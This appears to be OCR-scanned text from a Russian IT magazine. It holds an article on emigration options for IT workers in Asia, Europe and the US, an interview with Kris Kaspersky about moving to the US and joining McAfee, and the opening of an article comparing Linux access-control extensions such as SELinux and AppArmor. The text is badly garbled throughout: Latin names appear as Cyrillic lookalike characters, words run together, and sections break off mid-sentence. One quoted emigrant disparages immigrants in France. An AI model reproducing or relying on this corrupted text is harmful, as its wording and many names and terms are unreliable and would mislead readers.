немало серьезных предложений по части работы 
за границей). 

Плюс, разужты решил вплотную заняться 
поисками работы, значит, кэтому моментуты 
наверняка уже определился со списком стран- 
кандидатов, куда хотелось бы эмигрировать. Из 
этого тоже можно извлечь определенную выгоду: 
скажем, ты мечтаешьуехать в Австралию; значит, 
покопайся в инете и постарайся найти комьюнити 
русскоязычных «понаехавших» в страну кенгуру. 

В таком месте можно нетолько получить инфор- 
мацию из первых рук и узнать множество важных 
деталей, но и вполне вероятно, что там уже не 
разобсуждалисьтемы поиска работы, получения 
рабочей визы, вида на жительство итакдалее. 
Словом, незабывай, что практически любая ин- 
формация находится на расстоянии пары кликов, 
и нужно просто не лениться ее искать. 

Кстати, вопросы эмиграции, поиска работы. 



оформления бумаги ижес ними оченьчасто 
поднимаются на крупныхтуристических порта- 
лах, вроде форума Винского [ Ы:І:р:/Логипп.аѵѵсІ. 
гу/), так что для общего развития туда тоже стоит 
заглянуть. 

Ну и, конечно, не стоитзабывать о кадровых 
агентствах, хотя это палка о двух концах, и каждый 
решает сам, стоитли с ними связываться. «Поче- 
му?» — спросишьты. Позволь в ответ процитиро- 
вать тебе мнение Криса Касперски, который на 
работе за границей съел собаку: 

«Связываться с кадровыми агентствами я лично 
не рекомендую. Дело втом, что они рассчита- 
ны на поток, то есть берутся за самые легкие 
варианты, а остальным частенько отказывают. 
Плюс, очень много в этой среде кидалова,такчто 
у многих работодателей доверия кагенствамтоже 
нет. Ну, это какслужбы знакомств :). 

Асамый простой способ поиска работы — дейс- 
твовать через сайты самих фирм. На каждом 
сайте уважающей себя компании, внезависи- 
мости от ее размера, есть раздел «карьера». И 
даже если подходящих тебе позиций там нет, 
возможно, написать им все равно стоит, ведь под 
хорошихлюдей вакансии открываются по мере 
поступления». 

Крисдаеточеньдельный совет: помимо«ра- 
ботных» сайтов, действительно, стоитобратить 
внимание и на разделы вакансий на сайтах 
ІТ-компаний. 

Главное, помни — перед тем, какначинать 
всюду рассылать свое резюме, убедись, что оно 
правильно составлено. Это настоящая наука, и 
принятыеу нас форматы резюме существенно 
отличаются отзарубежных.Такчто вэтом вопро- 
се, возможно, как раз стоит прибегнуть к помощи 
профессионалов и заплатить им денег, чтобы 
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ФУТУРИСТИЧНЫЙ СИНГАПУР 



ПОЧЕМУ они УЕЗЖАЮТ? 



САМЫЙ ПЕРВЫЙ ВОПРОС. КОТОРЫЙ ОБЫЧНО ЗАДАЮТ ВСЕМ ЭМИГРАНТАМ: «ЧТО 
ПОБУДИЛО ВАС ПОКИНУТЬ РОДНУЮ СТРАНУ?». ВОТ ЧТО НА ЭТО ОТВЕЧАЮТ ЭМИГ- 
РИРОВАВШИЕ ЗА ГРАНИЦУ АЙТИШНИКИ: 

• В поисках лучшей зарплаты и карьерного роста не хотелось перебираться из регио- 
нов в «нерезиновые» Москву или Питер, поэтому выбор пал на «заграницу». 

• В России вообще нет достойной работы в ІТ-сфере. 

• Имея возможность перебраться в страну с лучшим уровнем жизни и заниматься там 
интересным, перспективным делом, грех ею не воспользоваться. А такого рода воз- 
можность, теоретически, есть у любого хорошего специалиста. 

• Хотелось посмотреть мир и показать себя. 

• Вдохновил пример знакомых/друзей. 

• Поступило заманчивое предложение из крупной ІТ-компании. 

Были, конечно, и другие варианты ответов. Например, кто-то искал лучшей жизни и 
стабильности для себя и семьи, а кто-то и вовсе, случайно столкнувшись с достаточно 
молодым для России явлением дауншифтинга, решил попытать счастья (в основном 
это касается аутсорсеров, живущих в странах Азии). 



потом не пришлосьудивляться: «Почему мне 
приходиттак мало откликов?!». 

АЗИЯ И АУТСОРСЕРЫ 

Начнем, пожалуй, с самой большой части све- 
та, которая пользуется огромной популярнос- 
тью у эмигрантов вообще иунашегоІТ-шного 
брата в частности — с Азии. 



Азиатские страны вовсе не случайнотак при- 
влекают искателей лучшей жизни; дело в том, 
что после «снежной России» народ зачастую 
стремится ктеплу, и в итоге выбор многихлюдей 
останавливается на Таиланде, Индии, Израиле, 
Малайзии итакдалее. Опять же, получить визу 
в некоторые азиатские страны не в пример про- 
ще, чем в страны Европы или Северной Амери- 



ки, а впоследствии там проще остаться совсем. 
Ну, а помимо климата и отсутствия проблем 
с бумагами, еще одним бесспорным плюсом 
становится дешевизна, которая заметна почти 
во всем, начиная от цен на жилье и заканчивая 
едой. Цены в некоторых уголках этой части 
света вполне могут ввергнуть москвича или 
петербуржца в некоторый ступор. 

Чтобы не быть голословными, приведем 
пример. У нашего коллеги, редактора журнала 
НагсІ’п’БоІ'І: Евгения Петрова, имеется опыт 
проживания и работы в Индии, и вот что он нам 
поведал: 

«Все эти штампы «о самой грязной стране 
мира» и «рассаднике заразы» не имеют ничего 
общего с действительностью (ну если, конечно, 
селиться не в полныхтрущобах). Мы —типич- 
ная городская семья, привыкшая к некоторому 
минимальному комфорту, поэтому не собира- 
лись уезжать «хоть куда-нибудь». 

С финансовой точки зрения нас подкрепляло 
наличие сдаваемой в аренду московской 
трешки и дистанционная работа на НагсІ’п’ЗоІ'Е 
Мы договорилисьс редакцией журнала, чтоя 
могу перейти на полностью удаленную работу. 

В период кризиса это был замечательный 
компромисс для обеих сторон :). 

Итак, 28 октября 2009 года мы приземлились в 
городе Тхируванантхапурам (или проще -Три- 
вандрум) — столице штата Керала. Это почти 
на самом юге Индии. Оттуда еще 40 км вверх до 
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местечка Варкала. Там мы нашли приличный 
ДОМ: четыре спальни, кухня, пара террас, холл, 
столовая и пр. В общем, нормальноежилище (в 
России я такого себе позволить не могу). 
Поскольку оно было в 20 минутах ходьбы от 
океана, месячная аренда составила $185, при 
условии оплаты за полгода вперед. Хорошие 
дома рядом с океаном обошлись бы в $300- 
$500, в зависимости от площади, жадности 
хозяев и умения торговаться. Еще около $30 в 
месяц уходило на оплату света и газа. 

Еда там дешевая. У нас выходило около $200 на 
всех, и это включая довольно частое посеще- 
ние прибрежных ресторанов. Местная кухня 
очень вкусная и разнообразная, не говоря уж 
о свежести и деликатесности отдельных блюд. 
Для самостоятельной готовки тоже есть почти 
все продукты, кроме, может быть, гречки и 
нормального сыра. 

Мы купили сильно подержанный, но вполне 
рабочий скутер за $350. На нем было сподруч- 
нее всем впятером добираться до пляжа и не 
только. В магазин там съездить, или на слонах 
покататься — очень удобно. В та ком виде мы 
стали местной достопримечательностью, даже 
несмотря нато, что тремя-четырьмя индусами 
на одном мотике никого неудивишь :). 

Конечно, нужно учитывать, что все описанное 
относится ксемейному оседлому варианту. Все 
очень размеренно и спокойно. Для любителей 
потусоваться это, конечно, нето место. Но оди- 
нокому непритязательному молодому человеку 
там вполнелегко можно найти опрятную комна- 



тушку на побережье за $70-$1 00 в месяц. Ну и 
на питание будетуходить примерно столько же. 
Хотя если хочется путешествовать, переме- 
щаться — тут уже немного другие бюджеты. Все 
же страна немаленькая». 

От себя заметим, что найти работу непосредс- 
твенно в Индии крайнетрудно, и зарплата в 
$500-$700там считается хорошей. В свете 
этого совсем неудивительно, что Индию в час- 
тности и страны Азии в целом таклюбят и ценят 
удаленщики, работающие через интернет. 
Впрочем, не будем забыватьотом, натерри- 
тории Азии расположено целых 53 государс- 
тва, и далеко не все они столь приветливы к 
иммигрантам. Взять хотя бы Китай и Японию, в 
которых все кардинальным образом отличается 
отвышеописанного. 

Здесь работа для ІТ-шниковтоже имеется, но 
уже несколько иного сорта — сюда стремятся 
и попадают в основном специалисты действи- 
тельно высокого класса (в частности, имеется 
почти вечная нехватка талантливых инжене- 
ров). Уровень цен в цивилизованных местах 
Восточной и Юго-восточной Азии на порядок 
выше (а в нецивилизованныхты врядли 
захочешь селиться), и да-да, здесь чертовски 
тесно — перенаселение, знаешь ли; на Востоке 
торчит почти 60% всего человечества. 

Уехать работать в высокотехнологичные страны 
Востока непросто, если ты, конечно, неаутсор- 
сер-дауншифтер, и тебе не все равно, где нахо- 
диться, лишь бы уровень цен и комфорта тебя 
устраивал. То есть, врядли ты сумеешь найти 




серьезную, хорошо оплачиваемую должность 
на том же побережье Китая, в туристичес- 
ко-курортной зоне, в то время как Шанхай, 
Пекин и Харбин, где расположены предста- 
вительства многих компаний-монстров ІТ, 
всегда находятся в поиске светлыхумов. 

Для того, чтобы перебраться сюда более 
основательно, понадобятся серьезные 
таланты, желание и упорство, немало возни 
с бумагами, а также придется учить местный 
язык, так как одним английским здесь уже 
не обойдешься. Хотя, повторимся, работа 
здесь имеется, и ее действительно много, 
просто веб-мастеров и 5Е0-специалистов тут 
хватает и своих :). 

Если же говорить об окончательном переезде 
на ПМЖ и получении гражданства, то это 
вообще огромная сложность — например, 
программ иммиграции в Японии практичес- 
ки нет, так что натурализация, по большому 
счету, возможна только через брак. В итоге 
большинство проживающих в стране восхо- 
дящего солнца ІТ-шников живут по рабочей 
визе, продляя ее, или же находят учебные 
варианты — можно поступить в японский вуз, 
после учебы остаться на стажировку, а дальше 

— глядишь, и хорошая работа найдется. 

ЕВРОПА -БОГАТСТВО ВЫБОРА 

Европа, как часть света, не намного меньше 
Азии — это 45 государств, которые сильно 
разнятся по всем параметрам. В этой связи 
кратко обрисовать, каково это — «жить в Ев- 
ропе», врядли возможно, ведьуровень цен, 
уровень жизни и многие другие факторы могут 
сильно варьироваться даже в пределах одной 
страны (а то и города). 

Европа привлекает ІТ-шников всех мастей, 
что довольно логично, ведьона многонаци- 
ональна и весьма толерантна. Прижелании 
здесь найдет свое место и карьерист, мечтаю- 
щий о престижной работе втоповой ІТ-ком- 
пании, и скромный удал енщик, ищущий благ 
цивилизации, но втишине и покое. 
Сказывается, конечно, и относительная 
близость Родины — всеже слетать из Лондона 
или Мадрида в Россию, чтобы навестить 
родных и друзей или разобраться с делами 

— куда ближе и дешевле, нежели, к примеру, 
с Бали. 

Перебирать все 45 государств и обстановку в 
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них мы, конечно, не будем, но по некоторым 
все же пройдемся. 

На Британских островах сейчас все довольно 
тоскливо. 

Ирландия, где еще 3-5 леттому назад было 
немало работы в ІТ-сфере, сегодня врядли 
сможет чем-то порадовать. «Гиннес», Дублин 
и День Святого Патрика — это, конечно, 
круто, но только первое время. Потом же, как 
показывает практика, становится скучно и 
грустно — работы сейчас почти нет (последс- 
твия кризиса), цены кусаются, да и климат на 
любителя. 

Британия, равно как и Франция, и без того 
наводнена «понаехавшими», а недавние из- 
менения в законах об иммиграции удручают 
— сейчас практически невозможно предска- 
зать, что будет через несколько лет, и по каким 
правилам будут давать ПМЖ и гражданство. 
Ктомуже, здесь недавно подняли планку для 
получения рабочейвизыТіегДчем почти 
полностью зарубили подачу документов из 



России. Дело в том, что для получения Тіег 
1 требуется не только сдача языкового теста 
ІЕБТ5 и наличие свободных финансовых 
средств, но и диплом магистра (Мазіег’з 
□едгее), а русские магистры и специалисты 
теперь приравниваются к бакалаврам. Еще по 
новым правилам нельзя отсутствовать в ПК 
больше 90 дней в году. Знающий народ сооб- 
щает, что при желании можно доказать и свою 
степень (получив в МАРІС нужную справку), 
да и в 90 дней, вроде бы, не должны входить 
отпуск и командировки, но на деле все это не 
всегда соответствует действительности. Если 
учесть также высокий уровень цен (комнату 
в приличном районе, рядом с метро дешевле 
500-700 фунтов (24-33 тыс. рублей) не найти, 
а поездка на метро обходится примерное 100 
«деревянных»), картина, сам понимаешь, 
получается не особенно привлекательная. 

В Испании тоже не слишком радужно — веете 
же последствия кризиса, паршивая эко- 
номическая ситуация в стране (Греция уже 
фактически обанкротилась, и Испания в этом 
вопросе уверенно дышит ей в спину). 

Очень велик процент безработицы — более 
20%, что делает Испанию лидером в этом 
вопросе во всей западной Европе, но в среде 
ІТ, тем не менее, что-то вполне можно найти. 
Без документов здесь, как и в большинстве 
других стран ЕС, поработать не выйдет (на 
любое место найдется куча желающих, но с 



документами), так что для получения рабочей 
визы потребуется приглашение от серьезного 
работодателя. Получить вид на жительство 
трудно, гражданство — еще сложнее. Цены в 
Испании — это что-то среднее между Питером 
и Москвой. Например, съем более-менее при- 
личной жилплощади в Мадриде обойдется 
тебе в 800-1000 евро в месяц, но в пригороде 
можно подыскать вариантза 500 евро. 
АвотГерманиявнаши нелегкие времена 
чувствует себя хорошо и вполне уверено. 

Если ты следишь за мировыми новостями, то 
знаешь, что новоиспеченные европейские 
«страны-банкроты» бросились просить помо- 
щи как раз у ФРГ. 

Работа для технарей здесь есть, более того, 
если тебя приглашает немецкая фирма, при 
этом сразу дается вид на жительство (на 
время работы). Правда, в случае расставания 
с работодателем тебя быстренько попросят 
удалиться из страны. 

В целом, с бумагами и трудоустройством 



ситуация аналогична другим странам ЕС — 
сперва компания, принимающая тебя на ра- 
боту, должна доказать, что такого же специа- 
листа невозможно найти в Германии или в ЕП. 
Остаться здесь на ПМЖ, получив гражданс- 
тво, достаточно проблемно, самые верные 
варианты — через брак или открытие своего 
дела. С остальным возможны трудности. 

Для комфортного проживания и работы в 
ФРГ тебе понадобится знать или выучить 
немецкий язык, хотя знание английского тоже 
не будет лишним. 

Разброс цен на жилье довольно велик, так 
как страна немаленькая. В больших городах, 
традиционно, дороже, то есть на среднеевро- 
пейском уровне: двушка в Мюнхене обойдется 
в 800-1000 евро в месяц; но в то же время в 
Лейпциге аналогичная жилплощадь может 
стоить порядка 300 евро. Стоимость про- 
дуктов, одежды и прочихтоваров по стране 
колеблется несильно. 

Во Франции последствия кризиса тоже 
заметны не слишком сильно, но есть немного 
другая проблема — какуже было сказано 
выше, это большое количество иммигрантов. 
Многие, кто прожил во Франции по нескольку 
лет, отзываются об этом в крайне негативном 
ключе: «Огромное количество отвратительно 
ведущих себя эмигрантов из бывших колоний 
и слабовольная полиция, у которой нет пол- 
номочий что-то с этим делать». Написавший 



приведенные строки ІТ-шник, кстати, в итоге 
принял решение вернуться в Россию. 

Но если засилье арабов и необходимость 
учить французский язык тебя не пугают, то в 
остальном квалифицированному специалисту 
или студенту здесь можно неплохо устроиться. 
Шансы найти работу весьма неплохи (но наши 
дипломы придется подтверждать), с оформ- 
лением бумаг все обстоит примерно также, 
как и в других странах ЕС. Цены и климат 
здесь, опять же, на любой вкус, хотя, конечно, 
у ІТ-шника врядли получится найти работу 
где-нибудь на Лазурном побережье :). Зато 
зарплаты у квалифицированных инженеров 
здесь начинаются где-то от 5000 евро. 

СЕВЕРНАЯ АМЕРИКА 
И КРИС КАСПЕРСКИ 

Историю этого человека мы решили вынести 
отдельно, потому что знаем, как наши читате- 
ли по нему скучают, и знаем, что большинство 
продолжает интересоваться его судьбой. 

Итак, для тех, кто не в курсе: один из люби- 
мей ш их народом авторов нашего журнала, 
известный на весь мир хакер Крис Касперски, 
уже успел объездить полпланеты и сейчас 
осел в Соединенных Штатах звездно-по- 
лосатой Америки. На данный момент Крис 
трудится на компанию МсАІее в должности ни 
много ни мало зепіог геѵегзе епдіпеег. 

О том, каку него все это получилось, давай 
спросим его самого. 

ШЫ\ (М): Как родилась идея уехать из Рос- 
сииЗУтебя был конкретный план эмигриро- 
вать, или все вышло спонтанно? 

Крис Касперски (К.К.): Это дл и н н а я и сто р и я . 

В общем, всему виной причины личного 
характера, которые мне здорово надоели — 
из-за них я решил куда-то переехать. Хотел 
зажить, что называется «самостоятельной, 
свободной жизнью». Атак как Москва и Питер 
меня совершенно не прикалывают, а больше 
нигде работы в РФ и нет, я стал рассматривать 
выездной вариант. 

М.: Перед тем, как осесть в Штатах, ты успел 
побывать в куче стран, помнится, был даже в 
ЮАР. С чем это было связано? 

К.К.: Технически сейчас я в Штатахуже в 
третий раз, а до этого я фрилансил по всему 
миру. В ЮАР был, да — сотрудничал там с ком- 
панией зепзерозТсот. По сути, в разъездах 
я выбирал между ЮАР, Израилем, Европой и 
Штатами. Присматривался. 

М.: Акакименно выбирал, от чего отталки- 
вался? То естьты находил предложения о 
работе и отталкивался от них, или вначале 
абстрактно сел и подумал на тему «страна, 
где я хотел бы жить», а уж потом искал работу 
именнотам? 

К.К.: Ну, прежде всего, конечно, была работа 
— мне предложили, я и поехал. Думал, что 
просто так, а оказалось, надолго. 



«для того, ЧТОБЫ ПЕРЕБРАТЬСЯ 
СЮДА БОЛЕЕ ОСНОВАТЕЛЬНО, ПО- 
НАДОБЯТСЯ СЕРЬЕЗНЫЕ ТАЛАНТЫ, 
ЖЕЛАНИЕ И УПОРСТВО, НЕМАЛО 
ВОЗНИ С БУАЛАГАМИ» 
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Вообще, сначала нужно именно поработать, 
и здесь я пробовал все возможные варианты 
(Малайзия, Корея, Гонконг, Таиланд). Просто 
чтобы хоть что-то понять, нужно пожить хоть 
немного в стране и посмотреть, вкурить в 
миграционное законодательство, оценить свои 
шансы. В общем, я какое-то время буквально 
жил в самолетах. И в итоге понял, что Азия меня 
не прикалывает. 

М.іТогда позволь вопрос про неизбежную и 
вездесущую бюрократию. Когда ты фрилансил и 
катался по всему свету, трудноли было с бумага- 
ми, в частности, с визами? 

К.К.: Да, с визами были проблемы, особенно 
поначалу, когда у меня официально не было ни- 
какой работы, а почти везде требуется справка с 
этой самой работы. Потом с этим стало намного 
проще. Дело втом, что в определенный момент 
я откопал в Москве хорошее визовое агентство, 
которое и взяло на себя решение моих проблем. 
Но, например, едва я сделал визу в Китай —там 
неожиданно затребовали оригиналы справок 
с работы, приглашения. В Америку, опять же, 
делал визу 6 месяцев — у меня были явные миг- 




рационные намерения, которыхя и нескрывал, 
такчто начали проверять мой бэкраунд. Ятогда 
летел на интервью в Масгоѵізіоп, и получилось 
очень забавно: я должен был прибыть в февра- 
ле, но визу выдали только в мае, такчто кним 
я добрался только в июле. Но всеже визы мне 
выдавали, еще нив одной не отказали. 

М: Всем бы твою удачу и таланты :). 

Следующий вопростоже из разряда самых 
очевидных — а какс языком, где и кактыучил 
английский, и только ли английский? 

К.К.: О, в свое время я задумал научиться писать 
на инглише. Но как это сделать? Кто будет 
править мои ошибки? Потыкался ятогда, поты- 
кался, и никуда не берутменя с моим позорным 
знанием языка. Тогда я устроился в один жур- 
нальчик, чтобы писатьэротические рассказики 
отимени девушки -лесбиянки, описывающей 
свои похождения. Там от моего английского 
тоже пришли в ужас, но... Статьи возбуждали 
молодых дрочеров, и редактор дал добро. Кор- 
ректоры тогда почти полностью переписывали 
тексты моих первых «статей», так что за вычетом 
всех штрафов у меня оставалось $5 за статью, 
но это была школа молодого бойца. Следую- 



щий шаг — устроился блоггером в молодую, но 
быстро растущую штатовскую компанию за $800 
в месяц. Это был ЕпсІеаѵогЭесигіІу. Я написал 
пять статей, из которых опубликовали две, 
представляешь? Но английский мой все равно 
сливал, так что особенно писать мне и не дали, 
особенно когда поняли, что я могу реверсить. Ну 
вот. Тогда-то и зародился проект, над которым 
работаю сейчас, а было это в июне 2008 года. 

М.: Погоди, а какутебя с языком сейчас, когда 
ты ездишь по всему миру, общаешься с людьми, 
доклады читаешьи, наконец, в Америке жи- 
вешь? 

К.К.:Мой английский — до сих пор не фонтан — 
я со слуха все понимаю, но сам не оченьхорошо 
говорю. Но когда приходится каждый день 
часов по 12 молотить языком, а потом оттяги- 
ваться по «культурной программе» еще часа 4, 
привыкаешь. 

А в Штатах языковой среды, кактаковой, и нет, 
это не Израиль. Например, у нас в команде 
три китайца — они между собой говорят на 
китайском, девушка с Тайваня, девушка из ЮАР 
и я из России. Плюсу шефа жена из Японии, 



шеф, добрейшей души человек, в последний 
моменттрудоустроил меня, так что в МсАІее я 
попал уже переводом. Официально они приня- 
ли меня в августе 2009 года, заключив со мной 
трудовой договор. 

М.: Получается, что прошел уже год. И как 
ощущения на «новом месте» (и в стране, и в 
компании)? 

К.К.: Первое впечатление отсамого Рестона 
(куда я прилетел из Сан-Франциско и где и живу 
сейчас) было оченьсильным. Представляешь, 
задница полная — один хайвей, высокаятрава, 
тропинка еще более запущенная, чем в ЮАР, а 
изтравы белки выпрыгивают. И на ведь город 
один сотовый оператор, один кинотеатр и два 
продуктовых магазина. Ну, еще компьютерный 
магазин Арріе, и все. 

Вообще, здесь в Рестоне хайтек-зона. Не Крем- 
ниевая долина, конечно, но всеже — помимо 
крупныхфирмтипа «Интела» и всего прочего 
есть и компании помельче, типа МсАі^ее, атакже 
офисы еще более мелких контор, типа Юеіепсе. 
В общем, во второй визит мнетут уже очень 
понравилось, и я решился. Ктомужеу нас здесь 
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вице-президенту нас изУкраины, а старший 
вице-президент из Германии. 

Или, к примеру, в магазине гражданин США 
говоритсо мной на английском, которого я не 
понимаю. В смысле, кассир. Потому что он — 
индус, а другой кассир — мексиканец. Водитель 
такси — обычно китаец или вьетнамец, и так 
далее. Потому туги национализма немного, и 
кприезжим почти нет отношения «понаехали 
тут». 

М.: Расскажи, какты попал в МсАІее. Это они 
тебя нашли, илиты их? 

К.К.: В фе врале 2009 ЕпсІеаѵогЭесигіІу, где я ра- 
ботал, продал все свои акции компании МсАі^ее, 
и мой шеф спросил меня, какие у меня планы 
на жизнь. Та к как я тогда был контрактником, то 
после этой сделки фактически терял работу, но 



очень дружный ТИМ... В общем, я из-за тима 
и подписался на это дело, хотя и думал, что в 
мега-корпорации (ау насоколо Ютыс. сотруд- 
ников и 5 НИИ, в одном из которых я), карьеру 
не построить. В больших компаниях итак много 
мозгов, да и бюрократия такая, какой даже в 
СССР не было. 

Нотакполучилось, что официально, на полную 
занятость, меня трудоустроили с августа, а 
зимой сказали, что я — сотрудник года. Второй 
сотрудник года — китайский ученый, с которым 
мы вместе оттягивались в Пекине. Больше 
сотрудников года не было. То есть, из 1 0 000 
человеквыбрали двух.Ты меня извини за выра- 
жение, но я просто [сепзогесі]. 

М.: Аэтогозваниятебяудостоили за какие-то 
конкретные заслуги? 
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К.К.: В общем , да. Если помнишь, была такая 
нашумевшая атака на Ооодіе — «Аигога». 
Вотза нее и наградили. Фокус в том, что я ее 
эвристикой распознал, модулем, который соб- 
рал еще в августе-месяце, то есть за полгода 
до самой атаки. Конечно, мне просто повезло, 
как везет немногим... Нов итоге оказалось, 
что передо мной открылисьтакие перспекти- 
вы, о которых я вообще мечтать не мог. Даже в 
принципе. 

М.: Например? 

К.К.: Возможностьзаниматься тем, что мне 
интересно. То есть, у меня есть свой продукт 
и свое видение ситуации. Я его точу, и меня 



никто не трогает :). Более того, даже вышес- 
тоящее начальство мне помогает. Вот сейчас 
главный архитектор в свободное время 
работает над моим экспериментальным про- 
ектом, который пока функционируеттолько на 
лабораторном столе. 

М.:Да , заниматься любимым делом, имея для 
этого и время, и средства, и получая за это 
деньги — это действительно прекрасно. А по 
фрилансерским разъездам не скучаешь? 

К.К.: Ну, я недавно два месяца нагло прогу- 
ливал, слоняясь по Европе и посылая шефу 
приветы то из Швейцарии, то из Афин :). Меня 
за это загнали в 5-дневный неоплачиваемый 
отпуск, то есть, я потерял 1/4 зарплаты за 
месяц. Обиделся жутко. 



Нет, на самом деле, я работал, конечно... Как 
раз гуляю по афинским развалинам, а тут на 
телефон приходитсмс, мол, полундра. Я хва- 
таю ноут (Азиз еее, благо он с собой, в сумке) 
и прямо среди развалин сажусь и работаю на 
правительство США :). 

М.: Но получается, в Америке ты осел уже 
надолго, разтебе все нравится и впереди 
прекрасные перспективы? 

К.К.:Если честно, Европа мне нравится боль- 
ше, так что Штаты вариант пока не оконча- 
тельный — представительства МсАі^ее есть и в 
Европе. А осел я пока что, так как невыездной. 

М.: Погоди, то есть сейчас ты в статусе неле- 
гала?.. 



К.К.: Нет, не совсем. Каждый раз при въезде в 
страну (в США), ты объясняешь таможеннику 
цели визита, показываешь вещдоки, беседу- 
ешьсним,аонснимает отпечатки, фотогра- 
фирует сетчатку и отправляеттебя дальше. 
Проходишь, в общем, через три круга ада, 
и последняя инстанция бухаеттебе штамп 
І94, где указано, сколько ты можешь быть в 
США — обычно это три или шесть месяцев с 
возможностью продления. Получается, что 
находиться в США можно и без визы, но вот 
выехать нельзя. Точнее, можно, конечно, но 
потом не получится въехать обратно. Вот я 
сейчас как раз такой «невыездной» — по- 
зиция легальная, просто І94 заканчивается. 
Можно продлить на 6 месяцев, но нельзя 
пересекать границу, так как визы нет. Как раз 



в понедельник вот подал петицию на смену 
статуса. 

Вообще, США — одна из немногих стран, у 
которой есть официальная госпрограмма по 
поддержке профессиональных рабочих. В 
других странах с этим труднее, там государс- 
тво не озабочено такими вопросами. 

М.: Что ж, удачи с бумагами, и давай на после 

док немного отвлечемся от работы. Расска- 
жи, как в США, а в частности, в городе Рес- 
тон, штат Виржиния, обстоят дела с ценами 
на жилье и еду, что с транспортом? Словом, 
посвяти нас в бытовые нюансы. 

К.К.: Как я искал жилье? Да я уже был в 
курсе, что здесь и как, разобрался еще во 
время прошлых визитов (и в инете можно 
найти все!). Жилье снимается элементар- 
но — за $2000 можно снимать двухэтажный 
дом с бассейном и личным кортом, на то у 
нас и деревня, хоть и до Вашингтона рукой 
подать. Но я за чуть меньшие деньги снимаю 
довольно скромную квартиру, потому что чис- 
то, с мебелью и быстро. При этом часто даже 
паспорта не спрашивают, как ни странно. 

Ну, уменя вотнеспрашивали ни ІС, никаких 
других документов. Сплату просто с кредитки 
списывают понедельно. 

А вот купить квартиру здесь... В общем-то, 
если брать в кредит, квартира в центре 
Рестона с одной спальней обойдется в $500 
в месяц, при зарплате порядка $10 000 в 
месяц. Так что получается, квартира практи- 
чески ничего не стоит. Но, повторюсь, у нас 
деревня :) 

С це намина еду и прочие товары жизнен- 
ной необходимости все обстоит примерно 
также: на 1 00 баксов можно набрать очень 
много вкусного в магазине «для богатых», в 
котором, кхм, немногие из наших сотрудни- 
ков отовариваются, и спокойно питаться куп- 
ленным неделю. Интернет... Ну, в принципе, 
256 килобит за $20 в месяц — это нормально, 
безлимитка. 

Авот машины уменя нет, таккакя водить 
не умею — как-то вот не научился раньше, 
а сейчас времени нетэтим заняться. И хотя 
от дома до офиса мне топать всего 1 5 минут, 
это все равно очень напрягает. В Штатах без 
машины — труба: например, без «колес» я 
не могу выбирать жилье там, где хочу. Здесь 
часто и тротуаров-то нет, только дороги. 

Так что в целом в Штатах очень даже ничего. 
Например, за полгода всего раз отключали 
воду, минуты на две. Уведомили об этом за 
три дня и страшно извинились. А все почему? 
Да потому что при всем здешнем бардаке тут, 
по крайней мере, есть с кого спросить. 

Р.$. Через три дня после этого интервью Крис 
успешно получил визу 0-1 А, то есть сменил 
свой официальный статус на неиммиграци- 
онный рабочий, счем мы его 
и поздравляем! 



«ПЕРВОЕ ВПЕЧАТЛЕНИЕ ОТ САМОГО 
РЕСТОНА БЫЛО ОЧЕНЬ СИЛЬНЫМ. 
ПРЕДСТАВЛЯЕШЬ, ЗАДНИЦА 
ПОЛНАЯ» 
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Гонка 

вооружений 

Сравниваем популярные расширения 
безопасности для ОС Ііпих 



Упіх, родившийся практически вместе с первыми компьютерами, 
использовал очень простой механизм безопасности (идо), который гуру 
семидесятых посчитали более чем достаточным. Но в современной 
системе, где крутятся десятки демонов и программ, запугценных из-под 
разныхучеток, грамотно разрулить все права старыми инструментами 
уже не получается. А делать что-то нужно. 



ДИСКРЕЦИОННЫЙ 
и МАНДАТНЫЙ КОНТРОЛЬ 
ДОСТУПА 

Для начала отвлечемся и поразмышляем отом, 
что есть и зачем нужно еще что-то прикручи- 
вать. Одна из задач любой ОС — обеспечить 



разделение информации, основываясь, в 
первую очередь, на требованиях конфиден- 
циальности и целостности. Традиционная 
модель Опіх оперируеттремя параметра- 
ми — пользователь, группа-пользователь и 
остальные. Называется она дискреционной 



(Оізсгебопагу Ассезз Сопігоі — ОАО), то есть 
добровольной моделью доступа. Пользователь 
сам определяет права доступа ксвоим файлам, 
а выполняющиеся программы имеюттеже 
права, что и запустивший их пользователь. 
Механизм ОАО опирается в своей работе только 
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Выбор режима работы ЗЕІіпих 



на тождество пользователя, игнорируя другую информа- 
цию, например, о роли пользователя в системе, функции и 
уровне доверия конкретной программы и необходимости в 
целостности данных. Каждая учетная запись имеет полную 
свободу действ ИЙ в пределах своих полномочий. 

Какты понимаешь, развернуться с ОАС особенно негде: 
все или ничего; винда — ита даетбольше возможностей по 
настройке доступа к объектам. Поэтому сегодня для Ыпих 
доступны решения, базирующиеся на совершенно другой 
модели защиты — МАО (Мапбаіогу Ассезз Сопігоі, прину- 
дительный контрольдоступа]. Они позволяютопределить 
политики безопасности над всеми процессами и объектами, 
решение о доступе принимается на основе большего коли- 
чества информации об объекте, а нетолько основываясь на 
тождестве пользователя. Причем МАО не отменяет, а допол- 
няет ОАС,таккаксначала проверяются права Опіх, и, если 
они запрещают доступ, то дальнейшая проверка просто не 
производится. Проверка прав выполняется только в том 
случае, если стандартные права Ппіх разрешают доступ к 
объекту. Любой объект помещается в некую виртуальную пе- 
сочницу, которая позволяет приложению вы пол пять только 
строго регламентированные задачи. Причем при описании 
доступа к объекту конкретные реализации могут придержи- 
ваться разных принципов: очень строгие правила по типу 
«что не разрешено явно — запрещено» и «минимально 
необходимые привилегии». Например, можно настроить 
системутак, что веб-сервер будет слушать соединения на 
стро го о предел е н н о м п о рту, с м ожет ч итать файлы тол ько 
в указанном каталоге и такдалее. То есть описать поведе- 
ние системы в ее нормальном состоянии, создавжесткий 
каркас, за который нельзя будет выскочить. Это позволяет 
выполнять программы с правами обычного пользователя, 
а доступ к необходимым ресурсам указывать при помощи 
политик. В дистрибутивах Ыпих используются два решения: 
ЭЕЫпих в ВебНаІ; и клонах, атакже АррАгтогв ІЭЬипШ. 

В ядре версии 2.6.30 появился код еще одного проекта — 
ТОМОУО Ыпих (іощоуазіцд), которому пророчатсветлое 
будущее, но пока по умолчанию он нигде не используется. 
Давай рассмотрим их особенности, атакже плюсы и минусы. 

СВЕРХЗАЩИЩЕННЫЙ 5ЕЫМУХ 

ПроектЭЕЕіпих (ЭесигТу ЕпЬапсеб Еіпих. 5еІіпихрго]есЕ 
ого ] зародился в недрах В. 5. М5А (МаОопаІЭесигіІуАдепсу), 
хмурые неразговорчивые дядьки которого поставили своей 
целью допилить Еіпихтаким образом, чтобы его можно было 
